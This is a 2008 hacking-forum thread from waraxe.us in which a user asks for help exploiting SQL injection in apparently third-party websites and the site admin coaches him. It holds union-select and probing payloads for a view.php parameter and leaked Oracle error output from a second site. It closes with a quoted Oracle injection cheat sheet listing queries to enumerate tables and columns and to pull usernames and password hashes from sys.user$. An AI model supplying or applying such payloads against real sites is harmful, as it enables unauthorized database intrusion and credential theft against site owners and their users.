|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 48
Members: 0
Total: 48
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help Pro in SQL inj |
|
Posted: Tue Feb 19, 2008 12:05 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
Hello , i need help
Code: | view.php?id_page=-1'A |
Error Mysql
and i right :
Code: | -1+union+select+1,2,3,4/* |
Error Mysql
and whene i put :
Code: | -1+union+select+1,2,3,4,5/* |
THe page changed but no column number
The page is blank No number
THankx |
|
|
|
|
Posted: Tue Feb 19, 2008 12:21 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this:
Code: |
view.php?id_page=1+OR+
|
error message??
next:
Code: |
view.php?id_page=1%2b1
|
Normal page? By the way, try with valid id_page number!
And then:
Code: |
view.php?id_page=1+AND+1=1
|
Error message?
Code: |
view.php?id_page=1%2b(SELECT+1)
|
Code: |
view.php?id_page=1--+
|
|
|
|
|
|
Posted: Tue Feb 19, 2008 3:32 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
Code: | view.php?id_page=1+OR+ |
Error Mysql
Code: | view.php?id_page=1%2b1
view.php?id_page=1+AND+1=1
view.php?id_page=1%2b(SELECT+1)
view.php?id_page=1--+ |
Work , but my problem is [ The Column number does not display in the page ]
the page in Blank |
|
|
|
|
Posted: Tue Feb 19, 2008 4:04 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
By blank you mean absolutely blank (length 0 bytes)?
If simple sql injection with visual feedback is complicated, then you can always use blind sql injection methods. |
|
|
|
|
Posted: Tue Feb 19, 2008 7:01 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
the page is normal , is not a 0 bytes , |
|
|
|
|
Posted: Tue Feb 19, 2008 9:08 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Feb 20, 2008 11:51 am |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
Ok waraxe , THankx
_______________________________________________________
in auter site i find this :
Code: | .php?lang=ar&page=-1'A |
Code: | Warning: ociparse() [function.ociparse]: ORA-01756: quoted string not properly terminated in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 210
Warning: ociexecute() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 212
Warning: ocifetchinto() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 214
Warning: ociparse() [function.ociparse]: ORA-01756: quoted string not properly terminated in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 234
Warning: ociexecute() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 236
Warning: ocifetchinto() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 238
Warning: ociparse() [function.ociparse]: ORA-01756: quoted string not properly terminated in /opt/apache2/htdocs/www/site_admin/site_data/main/visitors_counters.php on line 49
Warning: ociexecute() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/visitors_counters.php on line 51
Warning: ocifetchinto() expects parameter 1 to be resource, boolean given in /opt/apache2/htdocs/www/site_admin/site_data/main/visitors_counters.php on line 53 |
Oracle ????
and i try with this :
php?lang=ar&page=-14'+union+select+1+from+user/*
Code: | Warning: ociexecute() [function.ociexecute]: ORA-00903: invalid table name in /opt/apache2/htdocs/www/site_admin/site_data/main/functions_data.php on line 212 |
????????????????? |
|
|
|
|
|
|
|
|
Posted: Wed Feb 20, 2008 1:00 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
So there is no table named "user" in current database - exactly as error message displays.
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
Code: |
Getting Stuff
Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|